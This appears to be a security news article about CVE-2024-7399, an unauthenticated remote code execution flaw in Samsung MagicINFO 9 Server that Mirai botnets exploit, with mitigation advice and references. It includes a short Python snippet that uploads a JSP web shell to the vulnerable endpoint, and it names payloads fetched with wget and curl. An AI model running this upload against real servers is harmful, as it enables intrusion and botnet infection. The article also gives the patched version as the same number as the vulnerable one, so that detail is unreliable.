A critical vulnerability in Samsung’s MagicINFO 9 Server (version 21.1050.0) has been confirmed by Huntress, with active exploitation observed in the wild. The flaw, tracked as CVE-2024-7399, allows unauthenticated remote code execution (RCE) and has been integrated into Mirai botnet campaigns. Proof-of-concept (PoC) exploit code was published by SSD Disclosure on April 30, 2025, prompting urgent mitigation efforts.
Technical Analysis of CVE-2024-7399
The vulnerability stems from a path traversal flaw in the `/magicInfo/j_spring_security_check` endpoint, scoring 8.8 on the CVSS scale. Attackers leverage this to deploy Mirai variants such as LZRD, which download secondary payloads like `ohshit.sh` and `boatnet` via `wget` or `curl`. Arctic Wolf reported live attacks targeting unpatched systems, with binaries executing post-compromise lateral movement.
Exploitation requires no authentication, making internet-facing MagicINFO servers high-risk targets. The PoC demonstrates file upload capabilities via HTTP POST requests, as shown in this simplified example:
import requests
target = "http://[target]/magicInfo/j_spring_security_check"
files = {'file': ('shell.jsp', open('shell.jsp', 'rb'))}
requests.post(target, files=files)Mitigation and Response
Samsung released a patch in August 2024 (v21.1050), but unpatched systems remain vulnerable. Immediate actions include:
- Isolating MagicINFO servers from internet access
- Applying the vendor patch and verifying installation
- Monitoring for suspicious processes like `wget` or `curl` downloading binaries
- Inspecting system logs for requests to `/magicInfo/j_spring_security_check`
Network defenders should prioritize hunting for IoCs associated with Mirai campaigns, including known file hashes and command-and-control IP addresses. The attack chain aligns with typical botnet propagation tactics, where compromised devices are weaponized for DDoS attacks.
Broader Threat Context
This incident reflects wider trends in IoT exploitation, with threat actors rapidly weaponizing disclosed vulnerabilities. The integration into Mirai’s infrastructure suggests automated scanning for vulnerable systems, similar to historical patterns observed in VPN and router attacks.
Parallel campaigns targeting Cisco ASA devices (CVE-2023-20269) and VMware Aria (CVE-2023-34039) demonstrate attackers’ focus on enterprise management systems. The MagicINFO flaw is particularly concerning due to its use in digital signage deployments across retail, transportation, and corporate environments.
Organizations using MagicINFO should conduct thorough compromise assessments, as initial access could enable follow-on ransomware or espionage activities. The vulnerability’s public PoC lowers the barrier for entry, making widespread exploitation likely in the short term.
Conclusion
CVE-2024-7399 represents a clear and present danger to organizations running unpatched MagicINFO servers. The combination of public exploit code, active botnet integration, and high CVSS score creates urgent remediation requirements. Defensive strategies must combine patching with network segmentation and continuous monitoring for anomalous activity.
This case underscores the importance of timely patch management for specialized enterprise software. As attack surfaces expand with IoT adoption, similar vulnerabilities in less-visible systems will continue attracting threat actor attention.
References
- “SSD Advisory – Samsung MagicINFO Unauthenticated RCE”, SSD Disclosure, 2025.
- “Samsung MagicINFO Flaw Now Actively Exploited by Mirai Botnet”, CyberInsider, 2025.
- Samsung Security Updates, Samsung, 2024.
- “CVE-2023-20269: Cisco ASA/FTD Zero-Day Exploited by Ransomware Groups”, Security Affairs, 2023.
- “VMware Aria Operations for Networks Flaw PoC Released”, Security Affairs, 2023.
